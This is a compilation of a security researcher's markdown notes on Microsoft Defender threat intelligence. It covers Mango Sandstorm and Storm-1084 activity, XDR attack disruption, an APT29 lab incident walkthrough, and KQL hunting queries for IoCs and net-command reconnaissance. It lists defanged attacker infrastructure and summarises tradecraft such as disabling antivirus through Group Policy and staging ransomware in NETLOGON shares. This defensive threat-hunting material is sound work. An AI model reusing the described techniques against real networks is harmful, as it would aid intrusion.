14 | 15 | ![image](https://user-images.githubusercontent.com/120234772/235598610-51723cfb-b598-43bc-ac5c-2c344a384611.png) 16 | > Mango Sandstorm, Microsoft Defender Threat Intelligence 17 | 18 | ## Mango Sandstorm timeline 19 | #### August 25, 2022 20 | Mango Sandstorm, previously known for using Log4j 2 exploits to attack VMware apps, has recently been targeting SysAid apps using the same technique. Once they gain initial access, the group establishes persistence, moves laterally within the network using custom and well-known hacking tools, and dumps credentials. 21 | > [!Note] 22 | > [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 23 | 24 | 25 | #### April 7, 2023 26 | Mango Sandstorm, previously known for using Log4j 2 exploits and targeting on-premises environments, has now expanded its focus to include both on-premises and cloud environments. After gaining initial access through known vulnerabilities, the attack has been linked to Storm-1084 (formerly known as DEV-1084). 27 | > [!Note] 28 | > [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/) 29 | 30 | ## Mango Sandstorm associated groups 31 | There are several group names associated with Mango Sandstorm, and each group uses different attack techniques.
32 | - Earth Vetala 33 | - Mango Sandstorm (MERCURY) 34 | - Static Kitten 35 | - Seedworm 36 | - TEMP.Zagros 37 | - MuddyWater 38 | 39 | ## Mango Sandstorm attack techniques 40 | 41 | ### The most common attack techniques 42 | - Spear-phishing email 43 | - Use of cloud file-sharing services 44 | - Use of commercial remote access applications 45 | - Tooling: Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs 46 | - Exploiting vulnerabilities 47 | - Social engineering 48 | - Watering hole attacks 49 | - Backdoor installation 50 | - Lateral movement 51 | 52 | ### MITRE ATT&CK MuddyWater attack map 53 | ![image](https://user-images.githubusercontent.com/120234772/236394767-4a35fec6-0897-48ae-bfa3-e22db9a5a7ca.png) 54 | > MuddyWater, Techniques Used, [ATT&CK® Navigator](https://mitre-attack.github.io/attack-navigator/) 55 | 56 | 57 | ## Reference 58 | 1. August 25, 2022, [MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations](https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/) 59 | 2. April 7, 2023, [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/) 60 | 3. [What is Microsoft Defender Threat Intelligence (Defender TI)?](https://learn.microsoft.com/en-us/defender/threat-intelligence/what-is-microsoft-defender-threat-intelligence-defender-ti) 61 | 62 | #### Disclaimer 63 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 
64 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day06-M365D-XDR-AutomaticAttackDisruption.md: -------------------------------------------------------------------------------- 1 | # Day 6 - XDR automatic attack disruption 2 | Automatic attack disruption in Microsoft 365 Defender uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***. 3 | #### What is the objective of attack disruption? 4 | The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are two actions that can be taken: ***"device contain"*** by Microsoft Defender for Endpoint and ***"disable user"*** by Microsoft Defender for Identity. 5 | 6 | ## Advanced attacks vs XDR attack disruption 7 | Microsoft 365 Defender XDR provides coverage for the following three advanced attacks to disrupt further progression. 8 | 9 | 1. Adversary-in-the-middle attacks (AiTM) 10 | 2. Business email compromise (BEC) 11 | 3. Human-operated ransomware attacks 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4a26dc22-2a5a-4197-b000-8ceaa44f2111) 14 | > Automatic attack disruption, [Microsoft 365 Defender Blog](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) 15 | 16 | ## AiTM insights 17 | AiTM attack refers to ***"Adversary-in-The-Middle"*** phishing technique where attackers intercept communication between a user and a legitimate website, stealing passwords and session cookies to gain unauthorized access and perform fraudulent activities. 
18 | 19 | #### MS security blogs : AiTM timeline 20 | 21 | - July 12, 2022, [From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 22 | - November 16, 2022, [Token tactics: How to prevent, detect, and respond to cloud token theft](https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/) 23 | - March 13, 2023, [DEV-1101 enables high-volume AiTM campaigns with open-source phishing kit](https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/) 24 | - June 8, 2023, [Detecting and mitigating a multi-stage AiTM phishing and BEC campaign](https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/) 25 | 26 | ## BEC insights 27 | Business Email Compromise (BEC) is a cyberattack where attackers deceive organizations through fraudulent emails. They impersonate trusted individuals to trick employees into taking unauthorized actions, such as transferring money or revealing sensitive information. BEC attacks can lead to financial losses and reputational damage for businesses. 28 | 29 | - May 6, 2021, [Business email compromise: How Microsoft is combating this costly threat](https://www.microsoft.com/en-us/security/blog/2021/05/06/business-email-compromise-how-microsoft-is-combating-this-costly-threat/) 30 | 31 | ## Human-operated ransomware insights 32 | Human-operated ransomware attacks, also known as ***"hands-on-keyboard"*** attack, refer to a specific type of ransomware attack where skilled human attackers actively participate in various stages of the attack rather than relying solely on automated tools or malware. 
33 | 34 | - [Human-operated ransomware | Microsoft Learn](https://learn.microsoft.com/en-us/security/ransomware/human-operated-ransomware) 35 | - March 5, 2020, [Human-operated ransomware attacks: A preventable disaster](https://www.microsoft.com/en-us/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) 36 | 37 | ## MS blog - automatic attack disruption 38 | 1. [Automatic attack disruption in Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) 39 | 2. Feb 22 2023, [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) 40 | 3. Mar 08 2023, [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) 41 | 4. May 17 2023, [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751) 42 | 43 | 44 | 45 | #### Disclaimer 46 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 47 | -------------------------------------------------------------------------------- /CopilotLOGs/01-CopilotForSecurity-History.md: -------------------------------------------------------------------------------- 1 | # Microsoft Copilot for Security : LOG-01 2 | Welcome to my first log about Microsoft Copilot for Security. 3 | It has been one year since Microsoft announced Copilot. 4 | The purpose of this log is to catch up on the update histories of Microsoft Copilot for Security from its initial announcement to GA. 
5 | 6 | ## History of first announcement to GA 7 | Microsoft Copilot for Security was announced on March 28, 2023 - [Introducing Microsoft Security Copilot: Empowering defenders at the speed of AI](https://blogs.microsoft.com/blog/2023/03/28/introducing-microsoft-security-copilot-empowering-defenders-at-the-speed-of-ai/ ) 8 | 9 | After almost one year, Microsoft announced that Microsoft Copilot for Security will be generally available worldwide on April 1, 2024 - [Microsoft Copilot for Security is generally available on April 1, 2024, with new capabilities](https://www.microsoft.com/en-us/security/blog/2024/03/13/microsoft-copilot-for-security-is-generally-available-on-april-1-2024-with-new-capabilities/) 10 | 11 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/bc4e8afc-676f-40e6-8d41-ea3485f5ca0e) 12 | 13 | ## Microsoft Security Blog 14 | For the past year, I have been reading numerous security blogs about Microsoft Copilot for Security, which has made me even more surprised and excited to try it out in real life. These blogs have been very helpful for catching up on topics like ***"Generative AI", "Microsoft Copilot for Security", "AI". "Open AI", "Chat GPT"*** and so on. 
15 | 16 | | Date | Blogs | 17 | |:-----|:------| 18 | | March 28, 2023 | [Introducing Microsoft Security Copilot: Empowering defenders at the speed of AI](https://blogs.microsoft.com/blog/2023/03/28/introducing-microsoft-security-copilot-empowering-defenders-at-the-speed-of-ai/) | 19 | | March 28, 2023 | [With Security Copilot, Microsoft brings the power of AI to cyberdefense](https://news.microsoft.com/2023/03/28/with-security-copilot-microsoft-brings-the-power-of-ai-to-cyberdefense/) | 20 | | May 15, 2023 | [Microsoft Security highlights from RSA Conference 2023](https://www.microsoft.com/en-us/security/blog/2023/05/15/microsoft-security-highlights-from-rsa-conference-2023/) | 21 | | July 18, 2023 | [Microsoft Inspire: Partner resources to prepare for the future of security with AI](https://www.microsoft.com/en-us/security/blog/2023/07/18/microsoft-inspire-partner-resources-to-prepare-for-the-future-of-security-with-ai/) | 22 | | August 7, 2023 | [Microsoft AI Red Team building future of safer AI](https://www.microsoft.com/en-us/security/blog/2023/08/07/microsoft-ai-red-team-building-future-of-safer-ai/) | 23 | | October 19, 2023 | [Microsoft Security Copilot Early Access Program: Harnessing generative AI to empower security teams](https://www.microsoft.com/en-us/security/blog/2023/10/19/microsoft-security-copilot-early-access-program-harnessing-generative-ai-to-empower-security-teams/) | 24 | | November 8, 2023 | [Insights from Microsoft Security Copilot early adopters](https://www.microsoft.com/en-us/security/blog/2023/11/08/insights-from-microsoft-security-copilot-early-adopters/) | 25 | |November 15, 2023 | [Microsoft unveils expansion of AI for security and security for AI at Microsoft Ignite](https://www.microsoft.com/en-us/security/blog/2023/11/15/microsoft-unveils-expansion-of-ai-for-security-and-security-for-ai-at-microsoft-ignite/) | 26 | | December 6, 2023 | [Microsoft Security Copilot drives new product integrations at Microsoft Ignite to empower 
security and IT teams](https://www.microsoft.com/en-us/security/blog/2023/12/06/microsoft-security-copilot-drives-new-product-integrations-at-microsoft-ignite-to-empower-security-and-it-teams/) | 27 | | February 14, 2024 | [Microsoft Copilot for Security: The great equalizer for government security](https://www.microsoft.com/en-us/industry/blog/government/2024/02/14/microsoft-copilot-for-security-the-great-equalizer-for-government-security/) | 28 | | February 14, 2024 | [Staying ahead of threat actors in the age of AI](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/) | 29 | | February 21, 2024 | [Get the most out of Microsoft Copilot for Security with good prompt engineering](https://www.microsoft.com/en-us/security/blog/2024/02/21/get-the-most-out-of-microsoft-copilot-for-security-with-good-prompt-engineering/) | 30 | | February 22, 2024 | [Announcing Microsoft’s open automation framework to red team generative AI Systems](https://www.microsoft.com/en-us/security/blog/2024/02/22/announcing-microsofts-open-automation-framework-to-red-team-generative-ai-systems/) | 31 | | March 4, 2024 | [Defend against human-operated ransomware attacks with Microsoft Copilot for Security​​](https://www.microsoft.com/en-us/security/blog/2024/03/04/defend-against-human-operated-ransomware-attacks-with-microsoft-copilot-for-security/) | 32 | | March 13, 2024 | [Microsoft Copilot for Security: General Availability details](https://techcommunity.microsoft.com/t5/microsoft-security-copilot-blog/microsoft-copilot-for-security-general-availability-details/ba-p/4079970) | 33 | | March 13, 2024 | [Microsoft Copilot for Security is generally available on April 1, 2024, with new capabilities](https://www.microsoft.com/en-us/security/blog/2024/03/13/microsoft-copilot-for-security-is-generally-available-on-april-1-2024-with-new-capabilities/) | 34 | | March 15, 2024 | [Microsoft Copilot for Security generally available on April 1, with 
new capabilities](https://news.microsoft.com/en-cee/2024/03/15/microsoft-copilot-for-security-generally-available-on-april-1-with-new-capabilities/) | 35 | 36 | ***Source : https://www.microsoft.com/en-us/security/blog/*** 37 | 38 | #### Disclaimer 39 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 40 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Mango Sandstorm Attack techniques & insights 2 | 3 | While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. 4 | 5 | |#|Title|About| 6 | |:---|:---|:---| 7 | | Part 1 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part1-Overview.md) | Mango Sandstorm overview | 8 | | Part 2 | [ Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md) |August 25, 2022, Mango Sandstorm | 9 | | Part 3 | Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md |April 7, 2023, Mango Sandstorm & Storm-1084 | 10 | 11 | ## April 7, 2023, Mango Sandstorm 12 | 13 | #### Short Summary 14 | 15 | Mango Sandstorm, previously known for using Log4j 2 exploits and targeting on-premises environments, has now expanded its focus to include both on-premises and cloud environments. After gaining initial access through known vulnerabilities, the attack has been linked to Storm-1084 (formerly known as DEV-1084). 

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ee623697-5a31-48fe-933a-85fa360ef3c1)

> [!Note]
> [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/)


#### How has Mango Sandstorm changed compared to its previous activities?
Previously, Mango Sandstorm was observed primarily in on-premise environments. However, they have now expanded their activities to include ***cloud environments*** as well.
Additionally, there is strong suspicion that Mango Sandstorm is linked to ***Storm-1084***, according to Microsoft.


#### What is Storm-1084?
According to Microsoft, DEV-1084 publicly adopted the DarkBit persona and presented itself as a criminal actor interested in extortion.
This was likely done as an attempt to obfuscate Iran's link to and strategic motivation for the attack.
> [!Note]
> DarkBit - a new ransomware

#### Is there any evidence linking Storm-1084 to Mango Sandstorm?
- The email's IP address (146.70.106[.]89) is linked to Mango Sandstorm.
- Both were observed to use the same VPN service.
- Both were observed to use the same tools, such as Rport and Ligolo.
- vatacloud[.]com, the command and control used by Storm-1084, is controlled by Mango Sandstorm.

#### How do they conduct attacks on on-premise environments?
The initial access and lateral movement techniques employed in this attack are similar to the previous Mango Sandstorm technique.
The attackers compromised the on-premise environment by leveraging Group Policy Objects (GPOs) to ***disable security tools like antivirus.***
They also used GPO to ***create a scheduled task for delivering ransomware.*** The ransomware payload was placed in the NETLOGON shares on domain controllers.
Ultimately, the attackers encrypted files on targeted devices and left ransom notes.

#### What types of attacks were conducted in the cloud environment?
- Email impersonation
- Email dump using Exchange Web Server API
- Mass Azure resources deletion

## KQL : IoCs-Based Threat Hunting
Here is an out-of-the-box KQL query to hunt for Mango Sandstorm with Storm-1084. IOCs are available from the Microsoft blog - [MERCURY and DEV-1084: Destructive attack on hybrid environment](https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/).
#### IOCs csv file : [MangoSandstorm-Storm-1084-IOCs-042023.csv](https://github.com/LearningKijo/KQL/blob/main/KQL-XDR-Hunting/ThreatHunting/IOCs-Folder/MangoSandstorm-Storm-1084-IOCs-042023.csv)
```kql
// IoCs - MERCURY and DEV-1084: Destructive attack on hybrid environment
// Load the indicator list (Indicator, Type, Description) straight from the CSV on GitHub
let MangoSandstorm = externaldata(Indicator:string, Type:string, Description:string)
[@'https://raw.githubusercontent.com/LearningKijo/KQL/main/KQL-XDR-Hunting/ThreatHunting/IOCs-Folder/MangoSandstorm-Storm-1084-IOCs-042023.csv'] with (format='csv', ignorefirstrecord = true);
// Split the indicators by type so each table is matched on the right column
let Domains = (MangoSandstorm | where Type == "Domain"| project Indicator);
let IPaddress = (MangoSandstorm | where Type == "IP address"| project Indicator);
let SHA256hash = (MangoSandstorm | where Type == "SHA-256"| project Indicator);
(union isfuzzy=true
(DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has_any (Domains) or RemoteIP in (IPaddress)
| project Timestamp, DeviceId, DeviceName, ActionType, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
),
(DeviceFileEvents
| where Timestamp > ago(1d)
| where SHA256 in~ (SHA256hash)
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256
),
(DeviceProcessEvents
| where Timestamp > ago(1d)
| where SHA256 in~ (SHA256hash)
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256, ProcessCommandLine, InitiatingProcessCommandLine
),
(DeviceImageLoadEvents
| where Timestamp > ago(1d)
| where SHA256 in~ (SHA256hash)
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FileSize, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
)
)
```

--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md:
--------------------------------------------------------------------------------
# Day 2 - APT29, Midnight Blizzard (NOBELIUM), Evaluation Lab
> 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). The APT29 attack was named Midnight Blizzard in Microsoft's new naming taxonomy for threat actors. In this blog, I will use the name "NOBELIUM" instead of Midnight Blizzard.


In Microsoft Defender for Endpoint's [Evaluation Lab (MDE)](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluation-lab?view=o365-worldwid), the Solorigate (NOBELIUM) attack simulation is covered. This time, I will mainly focus on demonstrating MDE detection capabilities and how MDE captures the attack as EDR and XDR. Additionally, the available response capabilities of the product will be presented.
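The IoC-based hunting query in the Day 4 Part 3 note just above matches domains and IP addresses against DeviceNetworkEvents and SHA-256 hashes against the file, process and image-load tables. The Python below is an added example (not code from the note or from Microsoft) that replays that matching logic offline, so the grouping-by-type and the case-insensitive hash comparison can be checked against records you control. The CSV text, the event records and every indicator value in it are constructed placeholders, not the real IoCs from the blog; the `Table` key is an assumption standing in for the source table name.

```python
"""Offline replica of the IoC-matching logic in the Mango Sandstorm KQL query.

Added example, not from the original note. All indicator values and event
records below are constructed placeholders (RFC 5737 addresses, .invalid
domain, dummy hash), never real IoCs.
"""
import csv
import io
from typing import Dict, List

# Constructed stand-in for the IOCs csv: same three columns as the externaldata() call.
SAMPLE_IOC_CSV = """Indicator,Type,Description
example-c2.invalid,Domain,constructed C2 domain placeholder
203.0.113.10,IP address,constructed IP placeholder (TEST-NET-3)
{hash},SHA-256,constructed hash placeholder
""".format(hash="a" * 63 + "1")

HASH_TABLES = ("DeviceFileEvents", "DeviceProcessEvents", "DeviceImageLoadEvents")


def load_iocs(csv_text: str) -> Dict[str, set]:
    """Bucket indicators by Type, like the three `let` statements in the query."""
    buckets = {"Domain": set(), "IP address": set(), "SHA-256": set()}
    for row in csv.DictReader(io.StringIO(csv_text)):
        kind = row["Type"].strip()
        if kind not in buckets:
            continue
        indicator = row["Indicator"].strip()
        # `in~` is case-insensitive, so hashes are normalised once at load time.
        buckets[kind].add(indicator.lower() if kind == "SHA-256" else indicator)
    return buckets


def match_events(events: List[dict], iocs: Dict[str, set]) -> List[dict]:
    """Return the events that hit an indicator, tagged with the matching type.

    `has_any` in KQL is a term match; plain substring containment is used here
    as an approximation that is good enough for whole domain names.
    """
    hits = []
    for ev in events:
        table = ev["Table"]  # assumed key naming the source table
        if table == "DeviceNetworkEvents":
            url = ev.get("RemoteUrl", "")
            domain_hit = any(d in url for d in iocs["Domain"])
            ip_hit = ev.get("RemoteIP") in iocs["IP address"]
            if domain_hit or ip_hit:
                hits.append({**ev, "MatchedOn": "Domain" if domain_hit else "IP address"})
        elif table in HASH_TABLES:
            if ev.get("SHA256", "").lower() in iocs["SHA-256"]:
                hits.append({**ev, "MatchedOn": "SHA-256"})
    return hits


# Constructed sample telemetry in the shape of the projected KQL columns.
SAMPLE_EVENTS = [
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws01",
     "RemoteUrl": "https://example-c2.invalid/beacon", "RemoteIP": "198.51.100.7"},
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws02",
     "RemoteUrl": "https://learn.microsoft.com/", "RemoteIP": "203.0.113.10"},
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws03",
     "RemoteUrl": "https://learn.microsoft.com/", "RemoteIP": "192.0.2.5"},
    {"Table": "DeviceFileEvents", "DeviceName": "dc01", "FileName": "payload.bin",
     "SHA256": ("a" * 63 + "1").upper()},  # upper-case on purpose: exercises in~
    {"Table": "DeviceProcessEvents", "DeviceName": "ws04", "FileName": "notepad.exe",
     "SHA256": "ab" * 32},
]


def hunt(csv_text: str = SAMPLE_IOC_CSV, events: List[dict] = SAMPLE_EVENTS) -> List[dict]:
    """End-to-end run: load the IoC list, then sweep the events."""
    return match_events(events, load_iocs(csv_text))


if __name__ == "__main__":
    for hit in hunt():
        print(hit["DeviceName"], hit["MatchedOn"], hit.get("RemoteUrl") or hit.get("SHA256"))
```

Running it lists three hits (ws01 on the domain, ws02 on the IP, dc01 on the hash despite the upper-case spelling) and ignores the two clean records, which is exactly the set the union query would return for the same data.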


![image](https://user-images.githubusercontent.com/120234772/231689408-6805a007-69c2-46db-a834-f11e7a5d1870.png)
> Solorigate in MDE Evaluation Lab

## Incident response with Microsoft 365 Defender
During incident response, there are various approaches and scenarios, and Microsoft offers comprehensive documentation on incident response for Microsoft 365 Defender. At this time, I would like to focus on **containment** and **investigation**, as highlighted in the blue line below:
![image](https://user-images.githubusercontent.com/120234772/231698357-8ba1ef53-4c19-4ca8-9eba-0aba46681b06.png)
> incident response workflow, [Incident response with Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide)


## Incident response, investigation

### Let's investigate the details of the incident

Here are some important points to consider during [the investigation](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide).

1. Where the attack started.
2. What tactics were used.
3. How far the attack has gone into your tenant.
4. The scope of the attack, such as how many devices, users, and mailboxes were impacted.
5. All of the data associated with the attack.

>**Note** : When starting an investigation, it's important to navigate to **the incident page** instead of the alert page. This is because there can be a large volume of alerts and people may become lost or unsure of what they need to find.


| [Summary] | Check points |
|:---|:---|
| MITRE ATT&CK tactics | Analyze the full scope of the attack using the MITRE ATT&CK framework. |
| Scope | Check the impacted assets such as devices, users, mailboxes, and apps. |
| Evidence | Ensure that any suspicious activities related to the incident are identified. |
| Alerts | Check the timeline of those alerts. |

e.g.
At the time of the incident, I can see that 23 alerts are associated with it and [testmachine8] is an impacted device that requires action (containment) to be taken for incident response. In terms of suspicious activities, MDE has detected 31 entities.

![image](https://user-images.githubusercontent.com/120234772/231705669-82ce321d-d4c2-41df-ada8-43662ddf604d.png)
> Summary, Incident page

| [Attack story] | Check points |
|:----|:----|
| Incident graph | Check how your assets are related to suspicious entities and activities using a graph. |
| Alerts (Timeline) | Check how many alerts are associated with an incident, as well as the timeline of those alerts. |

e.g.
In the attack timeline, since the alert started from "suspicious service launched," it's possible that the service may have created additional malicious files or even established a C2C connection. Also, when I examine the incident graph, I can see that testmachine8 is connected to 'panhardware.com' and related files and processes.

![image](https://user-images.githubusercontent.com/120234772/231706242-4623984f-8853-48e5-8e02-6e71c4ad3f91.png)
> Attack story, Incident page

### Let's look into the depth of the alert
This is one of the alerts in the incident. The attack began from sbsimulator.exe, and sbsimulation_sb_340461_bs_293713.exe created a file, bdata.bin, which was detected as malicious activity.

![image](https://user-images.githubusercontent.com/120234772/231714249-885594bd-be8b-439a-a2e1-863dffd3b04a.png)
> Alert story, Alert page

Upon analyzing the timeline of the alert, it was found that all suspicious activities related to APT29 were captured on the device by MDE. I have summarized what the timeline is telling us.

![image](https://user-images.githubusercontent.com/120234772/233934128-8bb8670b-bccd-484e-90ce-6d4acf8fb79a.png)


## Incident response, containment
Regarding containment of ***the impacted device***, MDE has the capability to remotely isolate the device from the network.
- [Isolate devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network)
- [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network)

Also, if ***the user account*** is involved in the breach, then other response options are available.
- [Reset user account password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions)
- [Disable AD user / Azure AD user](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions)


![image](https://user-images.githubusercontent.com/120234772/231706957-6b6e2e71-ed9c-4d02-afbf-06a59f9c9825.png)
> e.g. Isolate devices from the network

--------------------------------------------------------------------------------
/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md:
--------------------------------------------------------------------------------
# MDE + MDI better together - Reconnaissance
Hello all defenders and threat hunters, and thank you for visiting my product research note.
In this blog series, I would like to zero in on Microsoft Defender for Endpoint (MDE) + Microsoft Defender for Identity (MDI) better together, showcasing the various advantages of deploying both products together.
Let's start by looking at reconnaissance in Part 1.

### Reconnaissance ?
Reconnaissance is the initial phase in which attackers gather information about the target network or system, identify vulnerabilities, and collect information.
This collected data will be used by the adversary to aid in other phases of the attack, such as initial access and credential theft.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/ea593e3e-d171-4101-80b6-48e80a0aa0eb)

## Detection, XDR

The attacker first wants to collect on-premise Active Directory (AD) information, so they executed some 'net' commands on the compromised device.
The significant aspect of deploying MDI is the ability to visualize, in terms of identity, what is happening on the compromised device.
However, if you have MDE (endpoint protection), it is also possible to see all commands that were executed by the attackers. In the end, you will be able to see alerts generated by both MDI and MDE.

At this time, I simulated [a ninja.ps1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md#simulation) script that executed some 'net' commands with base64 encoding on a compromised device,
which is already a domain-joined device managed by on-premises AD and protected by MDE.
After a few minutes, 1 incident (correlated with 3 alerts generated from MDE & MDI) appeared on the Incident page of the Microsoft Defender XDR portal, so let's take a look at each important point.

#### Incident, XDR correlation
| Alert title | Source | Description |
|:------------|:---------|:------------|
| User and group membership reconnaissance (SAMR) | MDI | David Ninja on Win11CC sent suspicious SAMR queries to Svr2016, searching for: all users and all groups in mdipoc.com, and also 2 sensitive groups. |
| Anomalous account lookups | MDE | An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets. |
| Suspicious sequence of exploration activities | MDE | A process called a set of windows commands. These commands can be used by attackers in order to identify assets of value and coordinate lateral movement after compromising a machine. |
> Details of the generated alerts in the incident

Notably, the capability to correlate alerts from different Defender products into a single incident is one of the powerful features of Microsoft Defender XDR.
Thanks to this capability, the page provides information on how many alerts were generated in this attack and displays related entities in a comprehensive graph.
Furthermore, for taking further actions, Microsoft Defender XDR captures all related assets, such as the accounts and devices involved in this attack.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5c2ebf8f-09ab-4336-838c-301da379eb75)
> Incident page : Discovery incident on one endpoint reported by multiple sources

#### MDI alert
Regarding identity detection, MDI generated an alert related to reconnaissance, providing a high-level overview, attack details, and a graph.
The attacker (from the compromised device) executed suspicious SAMR queries to the server, searching all users, groups, Domain Admins, and Schema Admins.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/562f108f-c254-404f-a9c7-0f51d62b0e9a)
> MDI alert : User and group membership reconnaissance (SAMR)

#### MDE alerts
Another benefit of deploying MDE is the ability to capture device-level activities. Unlike MDI alerts, MDE alerts provide details of the commands executed on the compromised device.
This capability allows for the visualization of all command activities chronologically in the alert story and the mapping of all related entities, such as a suspicious PowerShell script, as highlighted in 'Ninja.ps1'.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/641c457c-9dd6-4dba-a921-901b2cb6d3cd)
> MDE alert : Anomalous account lookups, executed commands

MDE can map the activity of a captured PowerShell script to MITRE ATT&CK™ techniques.
During my simulation, which specifically focused on reconnaissance, we observed several discovery tactics and a few executions.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/189ca17a-bc7f-40c8-9cd1-464a0002cee8)
> MDE alert: Suspicious sequence of exploration activities

## Hunting with KQL
Because the compromised device was protected by MDE, it captured the net command activities and stored them in the DeviceProcessEvents table. In the end, by writing a query, you can see all net command activities in Advanced Hunting.

```kusto
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName == "net.exe"
| where ProcessCommandLine has_any ("/domain", "user", "group")
// One row per device: the list of timestamped net commands and how many there were
| summarize CmdList = make_set(strcat(format_datetime(Timestamp,'yyyy-M-dd H:mm:ss'), " : ", ProcessCommandLine)) by DeviceId, DeviceName
| extend Case = array_length(CmdList)
| project DeviceId, DeviceName, Case, CmdList
| order by Case desc
```
> GitHub : LearningKijo/KQL - [Endpoint-NetExeListing-Reconnaissance.yaml](https://github.com/LearningKijo/KQL/blob/main/KQL-XDR-Hunting/Endpoint-Microsoft-Defender-for-Endpoint/Endpoint-NetExeListing-Reconnaissance.yaml)

